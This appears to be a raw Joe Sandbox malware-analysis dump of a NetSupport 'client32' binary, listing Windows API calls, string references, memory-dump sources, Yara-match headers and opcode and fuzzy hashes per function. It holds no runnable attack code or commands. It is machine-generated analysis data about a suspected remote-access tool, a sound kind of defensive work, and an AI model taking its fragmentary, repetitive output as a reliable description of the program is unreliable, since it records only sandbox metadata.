                                                                                  • API String ID: 1284810544-229394064
                                                                                  • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                  • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                  • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                  • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                  • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                  • RegisterClassA.USER32(?), ref: 11093483
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassLoad$CursorIconInfoRegister
                                                                                  • String ID: NSMClassList
                                                                                  • API String ID: 2883182437-2474587545
                                                                                  • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                  • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                  • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                  • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                  APIs
                                                                                  • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                                  • wsprintfA.USER32 ref: 1114568E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LoadStringwsprintf
                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                  • API String ID: 104907563-3240211118
                                                                                  • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                  • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                  • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                  • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                  • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                  • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                  • API String ID: 145871493-545709139
                                                                                  • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                  • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                  • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                  • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                  • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                  • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                  • API String ID: 2446111109-1196874063
                                                                                  • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                  • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                  • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                  • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                  APIs
                                                                                  • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                  • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                  • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageWindow$FindLongPostSend
                                                                                  • String ID: IPTip_Main_Window
                                                                                  • API String ID: 3445528842-293399287
                                                                                  • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                  • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                  • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                  • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                  APIs
                                                                                    • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,50D94AA1,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                    • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                  • IsWindow.USER32(?), ref: 110CF82B
                                                                                    • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                  • RemovePropA.USER32(?), ref: 110CF858
                                                                                  • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                  • DeleteObject.GDI32(?), ref: 110CF876
                                                                                  • DeleteObject.GDI32(?), ref: 110CF880
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1921910413-0
                                                                                  • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                  • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                  • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                  • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                  APIs
                                                                                  Strings
                                                                                  • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                  • %02x, xrefs: 11081610
                                                                                  • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                  • API String ID: 2111968516-476189988
                                                                                  • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                  • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                  • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                  • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                  APIs
                                                                                    • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                  • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                  • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                  • DeleteObject.GDI32(?), ref: 1111F516
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteObject$PaletteSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2820294704-0
                                                                                  • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                  • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                  • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                  • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                  APIs
                                                                                    • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                    • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                    • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                    • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                  • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                  • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                  • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                  • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                  Strings
                                                                                  • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                  • Global\Client32Provider, xrefs: 1104F1BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                  • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                  • API String ID: 3682529815-1899068400
                                                                                  • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                  • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                  • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                  • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                                  • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                  • String ID:
                                                                                  • API String ID: 4125181052-0
                                                                                  • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                  • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                                  • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                  • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
APIs
• __getptd.LIBCMT ref: 11171312
  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
• __getptd.LIBCMT ref: 11171329
• __amsg_exit.LIBCMT ref: 11171337
• __lock.LIBCMT ref: 11171347
• __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
• Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
• Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
• Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
APIs
  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
  • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
• std::exception::exception.LIBCMT ref: 11053483
• __CxxThrowException@8.LIBCMT ref: 11053498
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
• String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 2181554437-3415836059
• Opcode ID: a00efdcad8f2bad60e4870c7c17811d6641ded512b0e54363771028161f934e3
• Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
• Opcode Fuzzy Hash: a00efdcad8f2bad60e4870c7c17811d6641ded512b0e54363771028161f934e3
• Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
